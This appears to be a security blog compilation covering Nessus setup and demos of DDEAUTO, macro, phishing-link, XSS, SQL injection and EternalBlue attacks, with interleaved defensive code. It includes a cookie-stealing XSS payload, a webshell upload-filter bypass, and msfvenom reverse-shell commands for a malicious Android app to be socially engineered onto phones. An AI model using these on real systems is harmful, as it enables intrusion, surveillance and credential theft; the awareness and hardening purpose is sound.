How To Install Nessus Vulnerability Scanner

In our previous post we showed how to download and verify the hash of the Home edition of Nessus, and here we will show how to install it, set it up and run your first scan. This is a very basic setup to get you up and running quickly with the free version of Nessus. If you are going to be using it in a live production environment, don’t use this guide.

If you have not read the initial post go here then come back.

You should be where we left off, which is just after checking our hash and confirming it against the checksum, as below.

Get used to running the “ls” command to check which directory you are in and that you have access to the correct files.

We “ls” to check, as mentioned above, then use “dpkg -i”, which unpacks and installs the Nessus package.

While that runs and installs we need to go back to and get an activation code.

Fill in the details and wait for your email with the activation code.

Go back to your Terminal, where the install should now have completed. Check the window for errors and, if there are none, we are good to continue.

Run the following: “/etc/init.d/nessusd start”

Nessus is now running, so open a browser on the same machine and go to https://localhost:8834 and you should get the login screen.

Create a username and a password to log in for the first time (don’t forget these!) and you will get the activation page.

Leave the scanner type, and enter your activation key which you will have received by email.

If correct you will see the next screen. Now is the time to make a coffee, as this stage may take some time while Nessus sets itself up.

Once completed you will see the “New Scan” screen.

Select New Scan as shown, then select “Basic Network Scan”. This will allow us to do a basic scan of our internal home network.

We will need to find out the IP address of our network for the next step. The easiest way to do this is to use either “ifconfig” on a Linux box or “ipconfig” on a Windows box. Run this from a Terminal window and make a note of your IP address. (This is a simple step, so if you are unsure how to do it you really shouldn’t be installing Nessus, to be honest!)

Name and description can be whatever you want, but the IP address in the targets box needs to be the address range you want to scan. In the example it shows “”, which means that we are going to scan every address on our network. To scan an individual host you would use a single address, for example “”. Now save as shown below and you’ll go back to the main page.

To start your scan click the chevron, as outlined below, then wait for your scan to complete.

Once the scan completes, the real fun starts!

DDEAUTO Opens Webpage

We have already posted about DDEAUTO, but thought we’d show another one just as it’s slightly different.

If a document opens and you are greeted by a pop up of any kind, then I’d say 99 times out of a hundred, it’s going to be a malicious exploit and you should just close and delete the document immediately and run a full Anti-Virus scan with at least 3 different free scanners.

Then 2 weeks later re-run all the scans again.

The DDEAUTO Exploit in all Microsoft Office Documents

This is the new exploit which is everywhere at the moment.

It’s a little different to the typical Macro exploits which are normally used.

In general you will need to click on 2 pop ups to allow the exploit to run, however since writing this I have played around a bit more and managed to get it down to only one pop up.

The point of this video, however, is to show that if you read what the pop-up says, you should not be clicking on it under any circumstances.

It’s true that some documents are linked dynamically to keep all data in linked sheets up to date. However if you are using one of these you would normally know about it.

If you don’t normally use documents with linked data and you open one which asks you to allow linked data, don’t just click OK! If you know who sent it, ask them what it is, and if you don’t know where it came from you probably shouldn’t even be opening the attachment in the first place!

Then, after clicking yes to the first pop-up, we receive a second one; this is generally where the exploit will run. Ours is very obviously named for the sake of this demonstration, but an attacker would be trying their best to disguise it.

We hope that by watching this video you will be a little bit more educated and perhaps won’t click on that pop up box if you receive one of these emails!

Enjoy the Video.

Excel Malicious Macro Attachment

Hello again.

It’s 2017 and we are still enabling Macros in documents we receive via email! (Come on people!)

Anyways, there are still people out there who don’t believe a macro can be used this way, so here is a quick video you can show them.

In this short clip a user receives an email from, but you can clearly see it actually came from a gmail address, and it contains an Excel invoice attachment.

In this example we have Excel set to not allow Macros to run automatically, but we are aware that a lot of people don’t use this setting (you nut-cases!).

Notice that nothing happens until the Macro is enabled!

Don’t enable a macro unless you are 100% sure of what it is.

The Excel sheet contains a simple macro which opens IE and goes to a website. This demonstrates how easy it is for an attacker to use a macro to install malware or ransomware. We have used this method in our demo as it is very quick and visual, and seems to get the point across better than a more complicated example.
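For the DDEAUTO and macro posts above, here is an added defensive example (not code from the original posts) that inspects an Office OOXML attachment offline, before anyone opens it: it reports DDE/DDEAUTO field instructions in Word documents (re-joining instruction text that is split across runs) and the presence of a VBA project in Word or Excel files. The sample documents are constructed in-line and the placeholder command path is invented.

```python
import io
import re
import zipfile

# Word field codes: complex fields sit between fldChar begin/end with the instruction
# split over one or more <w:instrText> runs; simple fields carry it in w:instr.
FIELD_RE = re.compile(r'w:fldCharType="begin".*?w:fldCharType="end"', re.S)
INSTR_RE = re.compile(r'<w:instrText[^>]*>(.*?)</w:instrText>', re.S)
SIMPLE_RE = re.compile(r'<w:fldSimple[^>]*w:instr="([^"]*)"')
DDE_RE = re.compile(r'\bDDE(AUTO)?\b', re.I)


def field_instructions(xml):
    """Return every field instruction string in a document part, whitespace-normalised."""
    fields = [''.join(INSTR_RE.findall(block)) for block in FIELD_RE.findall(xml)]
    fields += SIMPLE_RE.findall(xml)
    return [' '.join(f.split()) for f in fields]


def inspect_office_file(data):
    """Return a list of findings for an OOXML (.docx/.docm/.xlsx/.xlsm) file given as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.lower().endswith('vbaproject.bin'):
                findings.append('VBA macro project present: ' + name)
            if name.startswith('word/') and name.endswith('.xml'):
                xml = zf.read(name).decode('utf-8', 'replace')
                for instr in field_instructions(xml):
                    if DDE_RE.search(instr):
                        findings.append('DDE field in %s: %s' % (name, instr[:80]))
    return findings


def build_archive(members):
    """Build a minimal OOXML-style zip from {member name: content}; used for the samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples (not real attachments). The DDE instruction is split across two runs.
DDE_DOC = build_archive({
    '[Content_Types].xml': '<Types/>',
    'word/document.xml': '<w:document><w:body><w:p>'
                         '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
                         '<w:r><w:instrText>DDE</w:instrText></w:r>'
                         '<w:r><w:instrText>AUTO c:/placeholder/example.exe "demo"</w:instrText></w:r>'
                         '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
                         '</w:p></w:body></w:document>'})
MACRO_BOOK = build_archive({'xl/workbook.xml': '<workbook/>', 'xl/vbaProject.bin': b'\x00constructed'})
CLEAN_DOC = build_archive({'word/document.xml': '<w:document><w:body><w:p><w:r><w:t>Invoice</w:t></w:r></w:p></w:body></w:document>'})
```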

Fake URL in Email

It’s 2017 and we are still clicking on links in emails!

This is a quick video to demonstrate how a link in an email displaying one address can take you somewhere completely different!

We’re going to follow this up with some videos showing malicious attachments.

Don’t trust emails!
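As an added example for the fake-URL video above (not code from the original post), this checker parses an HTML email body and flags any link whose visible text looks like an address but whose real destination is a different host. The email body is constructed for the demo; the hosts in it are documentation/test values.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Visible anchor text that reads as a URL or bare domain; group 1 is the host it shows.
URLISH = re.compile(r'^(?:https?://)?([A-Za-z0-9.-]+\.[A-Za-z]{2,})(?:[/?#]\S*)?$')


class LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == 'a':
            self._href, self._text = dict(attrs).get('href', ''), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == 'a' and self._href is not None:
            self.links.append((self._href, ''.join(self._text).strip()))
            self._href = None


def shown_host(text):
    """Host named by the visible link text, or None if the text is not address-like."""
    m = URLISH.match(text.strip())
    return m.group(1).lower() if m else None


def deceptive_links(html_body):
    """Return (visible text, real href) for links whose displayed host differs from the target host."""
    parser = LinkCollector()
    parser.feed(html_body)
    flagged = []
    for href, text in parser.links:
        shown, real = shown_host(text), urlparse(href).hostname
        if shown and real and shown != real.lower():
            flagged.append((text, href))
    return flagged


# Constructed sample email body: the first link displays one address but points elsewhere.
SAMPLE_EMAIL = """<p>Your invoice is ready. View it at
<a href="http://198.51.100.23/login">https://www.example-bank.com/login</a>
or <a href="https://www.example-bank.com/help">contact support</a>.
<a href="https://mail.example-bank.com/">mail.example-bank.com</a></p>"""
```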

XSS Cookie Steal

Here we demonstrate why you should be filtering any user input.

This shows how easy it is for an attacker to plant some malicious code on a site and steal the admin login credentials (Or another user), by using Cross-Site-Scripting. There is a great explanation on OWASP’s website.

First we test the text areas for correct input validation and when we find it is not being correctly checked we then look to exploit that flaw.

By enclosing the following in script tags, document.write('<img src="'+document.cookie+'"/>'); , we can send the stolen cookies to our PC and then reuse them on the site to gain access to the admin panel. From there we can add malicious code, create new users or look to get root access on the server.

The site is on and our attacking machine is on

To demonstrate this we are using the “XSS and MySQL File” VM from
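For the XSS post above, here is an added example (not code from the original post or the VM) of the two server-side controls that would have stopped this demo: HTML-encoding user input before it is written into the page body, and marking the session cookie HttpOnly so document.cookie cannot read it. The rendering functions and session id are constructed for illustration.

```python
import html
from http.cookies import SimpleCookie

# The payload shown in the post, wrapped in script tags (no exfiltration host is added here).
PAYLOAD = "<script>document.write('<img src=\"'+document.cookie+'\"/>');</script>"


def render_comment_vulnerable(comment):
    """Vulnerable: user input is concatenated straight into the HTML, exactly what the demo abuses."""
    return "<div class='comment'>" + comment + "</div>"


def render_comment_safe(comment):
    """Hardened: entity-encode every user-controlled character for the HTML body context.
    (Attribute, URL and JavaScript contexts need their own encoders; this covers element text.)"""
    return "<div class='comment'>" + html.escape(comment, quote=True) + "</div>"


def contains_active_script(rendered):
    """True if the rendered HTML still contains a live <script> tag."""
    return '<script' in rendered.lower()


def session_cookie_header(session_id):
    """Set-Cookie header for the session: HttpOnly blocks document.cookie, Secure and SameSite
    limit where the browser will send it."""
    cookie = SimpleCookie()
    cookie['session'] = session_id
    cookie['session']['httponly'] = True
    cookie['session']['secure'] = True
    cookie['session']['samesite'] = 'Strict'
    cookie['session']['path'] = '/'
    return cookie.output(header='Set-Cookie:').strip()
```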

SQL Injection to URL Redirect Part 2

In this video we start off by using “wget” to clone the site we are attacking, so that when users are redirected to our site they are less suspicious: any differences are subtle and won’t generally be noticed by normal users. Then we load the cloned pages on our web server.

For the purpose of the demo we have left the IP address showing in the address bar so you can see the difference. The original site is on .105 and our clone is on .104 (poisoning the hosts file or typo-squatting is a whole tutorial by itself).

Back to the hack. We have enough access that, if we wanted to, we could upload our own pages and replace the existing ones, but for the purpose of this demo we are going to change where the login URL points so it sends users to our clone site rather than the correct login page.

We could obviously do this with every link on the site. We could also just upload some further malicious code to the server so that every visitor to the site will have their browser injected with malicious code.

SQL Injection to URL Redirect Part 1

Today we are going to show how an attacker can leverage SQL Injection to redirect users to their own site/webpage for whatever malicious activity they choose.

This will be in two parts. The first will show how, using a tool called sqlmap, we can carry out successful SQL Injection and very quickly dump usernames and passwords. The “php?id=1” part of the URL is injectable, and this is what sqlmap will exploit.

Then, once we have access to the admin section, we upload our PHP shell, but the site has some basic filtering, so we change the filename and extension from “b374k-2.8.php” to “b374k-2.8 (copy).jpg.phtml”, which gets us past the filtering controls. It also shows why, even in password-protected areas of your site, you still need robust upload controls: if someone manages to access the area they will still have to work to be able to upload a shell. Always think security in depth. Always add layers.

This video ends with us logging into the uploaded webshell and accessing the www directory.
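The upload filter in the video was beaten by a second extension, so as an added example (not code from the original post or the target site) here is a filename and content check that rejects that exact trick: it allows exactly one extension from an allow-list, refuses server-executable suffixes wherever they appear in the name, strips path components, and confirms the file content matches the claimed image type. The file contents are constructed.

```python
import os
import re

ALLOWED_IMAGE_EXT = {'jpg', 'jpeg', 'png', 'gif'}
# Any of these anywhere in the name is rejected, not only as the final suffix; .phtml is the one
# the demo used to bypass a check that looked for ".php" alone.
EXECUTABLE_EXT = {'php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'phar', 'phps',
                  'cgi', 'pl', 'sh', 'jsp', 'asp', 'aspx', 'htaccess'}
SAFE_BASE = re.compile(r'^[a-z0-9][a-z0-9_-]{0,63}$')
MAGIC = {'jpg': b'\xff\xd8\xff', 'jpeg': b'\xff\xd8\xff', 'png': b'\x89PNG\r\n\x1a\n', 'gif': b'GIF8'}


def validate_upload_name(filename):
    """Return (ok, reason) for a user-supplied upload name."""
    if os.path.basename(filename.replace('\\', '/')) != filename:
        return False, 'path components not allowed'
    parts = filename.lower().split('.')
    if any(p in EXECUTABLE_EXT for p in parts[1:]):
        return False, 'executable extension'
    if len(parts) != 2:
        return False, 'exactly one extension required'
    base, ext = parts
    if ext not in ALLOWED_IMAGE_EXT:
        return False, 'extension not in allow-list'
    if not SAFE_BASE.match(base):
        return False, 'unsafe characters in name'
    return True, 'ok'


def validate_upload(filename, data):
    """Name check plus a magic-byte check so a PHP file renamed to .jpg is also refused."""
    ok, reason = validate_upload_name(filename)
    if not ok:
        return ok, reason
    ext = filename.lower().rsplit('.', 1)[1]
    if not data.startswith(MAGIC[ext]):
        return False, 'content does not match extension'
    return True, 'ok'


# Constructed sample uploads; the first two names are the ones from the video.
SAMPLES = [
    ('b374k-2.8.php', b'<?php constructed'),
    ('b374k-2.8 (copy).jpg.phtml', b'<?php constructed'),
    ('invoice.jpg', b'\xff\xd8\xff\xe0 constructed jpeg'),
    ('invoice.jpg', b'<?php constructed'),
    ('../../invoice.png', b'\x89PNG\r\n\x1a\n constructed'),
]
```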

How To Create a Malicious App for Android

So, I recently got interested in how secure Android apps are and how I could learn a bit more about them. The best way to learn? Create my own malicious app!

What else would we use other than Metasploit?

So we fire up the console like so…

service postgresql start


First we need to create the malicious .apk file, so open another Terminal window and use the following, making sure you enter your IP and port number after the “=” symbols.

msfvenom -p android/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xxxx -o malicious.apk

You can name the app whatever you like using the “-o” switch. There are also other options you can specify but we will keep it simple for now.

In the first window running Metasploit we now start a handler, which will “listen” for when our app is installed and used, which launches the connection attempt. We do this like so.

use exploit/multi/handler

Then we need to set the IP, port and payload. The port and IP need to be the same as those set in the previous step when using msfvenom.

set LHOST xx.xx.xx.xx

set LPORT xxxx

set PAYLOAD android/meterpreter/reverse_tcp

We can check what is required for an exploit at any time once it is loaded by running:

show options

We now have everything we need configured, so we can start the “listener”.


Then we use social engineering to try and get someone to install and run it.

When they do, you will see the connection come back from the phone.

In this example we got 2 connections! We can list them with this command:

sessions -i

We can then connect by using the same command but choosing which session we want to connect to.

sessions 1

And then quickly get some info to confirm the device.


Then we can dump info from the phone immediately using the dump commands.



You can also capture a screenshot, take a photo from either camera, or even stream live from either camera on the device. Scary, huh?

If you have NO anti-virus on your Android, and you have disabled the “verify apps” feature, then this simple app will run without any issues.

If you have an Android phone, enable the app verifier and get some anti-virus to at least give yourself a fighting chance!

There will be a follow-up to this post, as there are tools we can use to make our malicious apps look better and be less likely to be blocked by anti-virus. That’s it for now though.

Eternal Blue Scan and Exploit Demo

It’s everywhere at the moment: ms17_010, or Eternal Blue as it’s affectionately known. It’s another great example of why it’s so important not only to keep your anti-virus solution up to date, but also to install the latest patches for your OS. This exploit requires just 2 things: that the port is open and that the required patch is not installed. In this demonstration we are attacking Windows Server 2008, set up using the Metasploitable 3 script from this project

You can see that both the scanner and the exploit are built right into Metasploit and they are very easy to use. Patch your machines. Even if you think you can’t, set up a test environment and try. Make good backups, and check that they work. Enjoy the video.

If you want to set up Metasploitable 3 you need to do a bit of legwork: it doesn’t just work out of the box like its predecessor, and you need to install some prerequisites. The guides I used are here and here